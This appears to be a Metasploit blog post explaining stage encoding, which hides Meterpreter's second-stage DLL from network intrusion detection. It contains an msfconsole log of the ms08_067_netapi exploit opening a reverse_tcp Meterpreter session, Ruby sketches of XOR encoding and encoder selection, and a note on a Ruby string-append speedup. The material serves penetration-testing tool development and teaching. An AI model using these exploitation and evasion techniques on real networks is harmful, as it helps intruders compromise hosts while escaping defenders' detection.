Last updated at Tue, 25 Apr 2023 22:47:39 GMT

As I mentioned in my post about compiling on the fly, an encoder's primary purpose in life is to avoid bad characters in a payload. To recap, a character is usually considered "bad" because some aspect of the exploit makes it impossible to use. For example, a character may get stripped out or mangled on its journey through protocol decoding. In the telnet protocol, \xff is the IAC (Interpret As Command) byte. It is treated specially and cannot be used in a payload delivered via that protocol.
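A minimal sketch of what "a bad character" means in practice: scan a payload for any byte in a bad-character set, here the telnet IAC byte. `bad_char_offsets` and `TELNET_IAC` are hypothetical names written for illustration; this is not Metasploit's API.

```ruby
# Hypothetical helper: return the offsets of every byte in `payload`
# that also appears in the bad-character set `badchars`.
TELNET_IAC = "\xff".b  # Interpret As Command byte in the telnet protocol

def bad_char_offsets(payload, badchars)
  bad = badchars.bytes
  payload.bytes.each_with_index.filter_map { |byte, i| i if bad.include?(byte) }
end

payload = "\x90\x90\xff\x31\xc0\xff".b
p bad_char_offsets(payload, TELNET_IAC)  # => [2, 5]
```

Any non-empty result means this payload cannot be sent as-is over telnet; an encoder's first job is to transform it until the result is empty.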

However, encoders have a secondary purpose as well: entropy. Because of the nature of executable payloads, encoders are essentially ineffective against anti-virus in most cases, but they can be much more useful against network-based intrusion detection. The more random the traffic, the harder it is for pattern matching on packets to notice anything nefarious.
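One rough way to put a number on "as random as possible" is Shannon entropy in bits per byte. This is a sketch for intuition only, assuming nothing about how Metasploit or any IDS measures randomness: a buffer of one repeated byte scores 0, and a buffer where all 256 byte values are equally common scores the maximum of 8.

```ruby
# Shannon entropy of a byte string, in bits per byte (0.0 .. 8.0).
def entropy(buf)
  return 0.0 if buf.empty?
  n = buf.bytesize.to_f
  buf.bytes.tally.values.sum do |count|
    prob = count / n
    -prob * Math.log2(prob)
  end
end

puts entropy("AAAA")                             # one repeated byte
puts entropy((0..255).to_a.pack("C*"))           # every byte value once
puts entropy(Random.new.bytes(4096)).round(2)    # random data, close to 8
```

Plain machine code and PE headers sit well below the maximum, which is part of what makes them easy to fingerprint.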

One place this has been missing is second-stage payloads. With a staged payload, the first stage connects back to Metasploit, which hands it a larger, more featureful payload. In the case of Meterpreter, the second stage is actually a DLL that uses Stephen Fewer's reflective loading technique so that the whole file can be treated as shellcode. From a network defense perspective, this means an MZ header comes across the wire. That's bad news for the poor pentester who's just trying to make ends meet by owning corporate networks and stealing passwords.
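To see why an unencoded DLL stage is so easy to spot, here is a naive signature check of the kind a network sensor could run over a reassembled stream. It uses the standard PE layout: a DOS header starting with "MZ", whose `e_lfanew` field (a little-endian 32-bit value at offset 0x3C) points at the "PE\0\0" signature. `looks_like_pe?` is a hypothetical name, and this is a sketch, not how any particular IDS implements its rules.

```ruby
# Hypothetical signature check: does this buffer start with a PE image?
def looks_like_pe?(buf)
  buf = buf.b
  return false unless buf.bytesize >= 0x40 && buf.start_with?("MZ")
  e_lfanew = buf.byteslice(0x3C, 4).unpack1("V")  # offset of the PE header
  buf.byteslice(e_lfanew, 4) == "PE\0\0".b
end

# Minimal fake header: "MZ", padding up to 0x3C, e_lfanew = 0x40, then "PE\0\0".
header = ("MZ" + "\0" * 0x3A + [0x40].pack("V") + "PE\0\0").b
puts looks_like_pe?(header)                                    # => true
puts looks_like_pe?(header.bytes.map { |b| b ^ 0x5a }.pack("C*"))  # => false
```

XORing every byte with even a single constant is enough to defeat a check this literal.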

Enter stage encoding. Encoding the second stage works just like encoding the stager but the purpose is different. Since the exploit has already done all the hard work of achieving code execution, and the first stage has prepared a nice chunk of memory for us to run in, the second stage doesn't have to worry about pesky things like character restrictions.
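A minimal sketch of the idea, assuming a plain repeating 4-byte XOR, which is far simpler than shikata_ga_nai. A real encoder also prepends a small decoder stub that the first stage runs; that stub is omitted here. `xor_stage` is a hypothetical name.

```ruby
# Hypothetical sketch: repeating 4-byte XOR over the whole stage.
# XOR is its own inverse, so the same function encodes and decodes.
def xor_stage(stage, key)
  k = key.bytes
  stage.bytes.each_with_index.map { |b, i| b ^ k[i % k.size] }.pack("C*")
end

# No bad characters to dodge, so the key only needs to be random. Zero bytes
# are excluded because XOR with 0 would leave those positions unchanged.
key = Array.new(4) { rand(1..255) }.pack("C*")

stage   = ("MZ" + "\x90" * 62).b        # stand-in for the start of a DLL
encoded = xor_stage(stage, key)
puts encoded.start_with?("MZ")          # => false
puts xor_stage(encoded, key) == stage   # => true
```

Because there is no bad-character set, the only requirement on the key is that it is unpredictable.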

Here it is in action:

```
01:49:54 0 0 exploit(ms08_067_netapi) > show advanced

[ ... snip ... ]

Payload advanced options (windows/meterpreter/reverse_tcp):

[ ... snip ... ]

   Name           : EnableStageEncoding
   Current Setting: false
   Description    : Encode the second stage payload

[ ... snip ... ]

   Name           : StageEncoder
   Current Setting:
   Description    : Encoder to use if EnableStageEncoding is set

[ ... snip ... ]

01:49:55 0 0 exploit(ms08_067_netapi) > set EnableStageEncoding true
EnableStageEncoding => true
01:49:55 0 0 exploit(ms08_067_netapi) > exploit -z

[*] Started reverse handler on
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 1 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP1 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (752158 bytes) to
[*] Meterpreter session 8 opened ( -> at 2013-01-29 01:50:18 -0600
[*] Session 8 created in the background.
01:50:18 1 0 exploit(ms08_067_netapi) >
```

The output here is only subtly different from before. Stage encoding adds a new line ("[*] Encoded stage with x86/shikata_ga_nai") telling us it has done its job. But the network is a different story. Here's what it looks like without stage encoding:

And here it is with stage encoding enabled:

Like encoding of the stager (or the single stage, in the case of a standalone payload), we start with the highest-ranked encoder module and fall through to lower-ranked modules if that doesn't work. Since there are no bad characters to avoid, the system will always pick the highest-ranked encoder. Encoders are ranked by randomness, so you'll get a pretty good pile of entropy from the default for your platform (for x86, this is shikata_ga_nai). If you don't like that choice, you can select a particular encoder with the StageEncoder advanced option.
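The selection order described above can be modeled in a few lines. This is a hypothetical sketch, not Metasploit's code: `Encoder`, `EncodingFailed`, `pick_and_encode`, and the rank numbers in the usage are all made up for illustration. Encoders are tried from highest to lowest rank, a failure falls through to the next one, and a preferred name (playing the role of StageEncoder) narrows the search to that encoder.

```ruby
# Hypothetical model of rank-ordered encoder selection with fallback.
Encoder = Struct.new(:name, :rank, :encode)

class EncodingFailed < StandardError; end

def pick_and_encode(encoders, buf, badchars: "", preferred: nil)
  candidates = encoders.sort_by { |e| -e.rank }            # highest rank first
  candidates = candidates.select { |e| e.name == preferred } if preferred
  candidates.each do |enc|
    begin
      return [enc.name, enc.encode.call(buf, badchars)]
    rescue EncodingFailed
      next  # fall through to the next lower-ranked encoder
    end
  end
  raise EncodingFailed, "no encoder succeeded"
end

reverse = ->(buf, _bad) { buf.reverse }   # toy "encoder" that always works
encoders = [Encoder.new("low", 100, reverse), Encoder.new("high", 600, reverse)]
p pick_and_encode(encoders, "abc")                    # => ["high", "cba"]
p pick_and_encode(encoders, "abc", preferred: "low")  # => ["low", "cba"]
```

With an empty bad-character set nothing ever forces a fallback, which is why the highest-ranked encoder always wins.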

The idea for stage encoding has been around for a long time -- the first commit to introduce it was back in 2007 -- but it's been disabled for almost as long. Back in October, open source contributor Agix brought it back to the world's attention with a pull request that uncommented the encoding. Unfortunately, it still had the problem skape had encountered in 2007: it simply took far too long to encode the much larger second-stage buffer. After debating with several folks about what to do, I decided to just dig in, find out why it was so slow, and see whether there was anything we could do about it.

Two major performance enhancements came out of that digging. The first takes advantage of the fact that no XOR key can be bad when there are no bad characters to avoid, so a loop over the entire buffer can be short-circuited. That saved a bit. The second was much more substantial and has to do with a quirk of Ruby string manipulation that I mentioned back in 2009.
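Here is a hypothetical sketch of that first optimization, assuming a repeating 4-byte XOR key; `find_xor_key` is an illustrative name, not Metasploit's method. With bad characters, every candidate key has to be checked against every byte of the output, and that scan is a full pass over a ~1MB buffer. With no bad characters, any key is valid and the scan is skipped.

```ruby
# Hypothetical key search for a repeating 4-byte XOR encoder.
def find_xor_key(buf, badchars, rng: Random.new, max_tries: 1000)
  bad = badchars.bytes
  # Short-circuit: with no bad characters, every key is acceptable.
  # (Zero bytes are still avoided so that no position goes unencoded.)
  return Array.new(4) { rng.rand(1..255) }.pack("C*") if bad.empty?

  bytes = buf.bytes
  max_tries.times do
    key = Array.new(4) { rng.rand(1..255) }
    next if key.any? { |k| bad.include?(k) }  # the key itself is embedded too
    # Full pass over the buffer: one bad output byte rejects this key.
    clean = bytes.each_with_index.none? { |b, i| bad.include?(b ^ key[i % 4]) }
    return key.pack("C*") if clean
  end
  nil  # no acceptable key found
end

p find_xor_key(("A" * 16).b, "\x00".b).bytesize  # => 4
```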

String#<< is the append operator: it takes its argument and stuffs it onto the end of your string, changing the string in place. String#+, on the other hand, returns a new String containing both. There is some overhead in creating a new object rather than changing an existing one, but that's only part of the issue here. The difference from a performance perspective is best illustrated with some pseudo-C:

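```c
// String#<<  (append in place: only `other` is copied)
size_t len = strlen(self);
self = realloc(self, len + strlen(other) + 1);
memcpy(self + len, other, strlen(other) + 1);   // +1 copies the NUL terminator
return self;

// String#+  (new string: both `self` and `other` are copied)
char *a = malloc(strlen(self) + strlen(other) + 1);
memcpy(a, self, strlen(self));
memcpy(a + strlen(self), other, strlen(other) + 1);
return a;
```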

Notice that appending requires copying only the argument, while creating a new string requires copying both, in addition to the small overhead of creating a new string object. Notice also what happens when you put this in a loop that builds up a buffer: every iteration re-copies everything accumulated so far, so the total copying grows with the square of the buffer's size, the object-creation overhead gets multiplied by the length of the loop, and you take another hit the next time the garbage collector runs.
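The object-level difference is easy to observe directly in Ruby. This short demo only shows the semantics (in-place mutation versus a fresh object); it does not measure speed.

```ruby
buf = +""                    # unary + gives a mutable (unfrozen) string
original = buf
buf << "AAAA"                # String#<<: appends in place
puts buf.equal?(original)    # => true, still the same object
buf += "BBBB"                # buf = buf + "BBBB": copies both into a new String
puts buf.equal?(original)    # => false, buf now names a fresh object
puts original                # => AAAA, the old object was left behind as garbage
```

In a loop, each `+=` leaves one more discarded intermediate string like `original` for the garbage collector.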

Changing one line in the encoding system to use << instead of += improved the performance of encoding large buffers by two orders of magnitude. The result is usable encoding of ~1MB of shellcode and no more MZ headers on the wire.
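To reproduce the effect in miniature, here is a hypothetical stand-in for an encoder's main loop: it XORs a buffer in 4-byte blocks and accumulates the output either with `<<` or with `+=`. `encode_blocks` and `time_it` are illustrative names, and the 64 KiB buffer is kept small on purpose so the slow path finishes quickly. Timings depend on the machine and Ruby version, so no numbers are claimed here.

```ruby
# Hypothetical encoder loop: XOR 4-byte blocks, accumulating output either
# in place (<<) or by building a new String each time (+=).
def encode_blocks(buf, key, append:)
  k = key.unpack1("V")
  out = String.new(encoding: Encoding::BINARY)
  (0...buf.bytesize).step(4) do |off|
    block = buf.byteslice(off, 4).ljust(4, "\0".b)  # pad a short final block
    enc = [block.unpack1("V") ^ k].pack("V")
    if append
      out << enc   # copies only the 4 new bytes (amortized)
    else
      out += enc   # copies everything accumulated so far, every iteration
    end
  end
  out
end

def time_it
  t0 = Process.clock_gettime(Process::CLOCK_MONOTONIC)
  yield
  Process.clock_gettime(Process::CLOCK_MONOTONIC) - t0
end

stage = Random.new(1).bytes(64 * 1024)
key   = "\x11\x22\x33\x44".b
t_append = time_it { encode_blocks(stage, key, append: true) }
t_plus   = time_it { encode_blocks(stage, key, append: false) }
puts format("<<: %.4fs   +=: %.4fs", t_append, t_plus)
```

Doubling the buffer size roughly doubles the `<<` time but roughly quadruples the `+=` time, which is how a one-line change can matter so much at ~1MB.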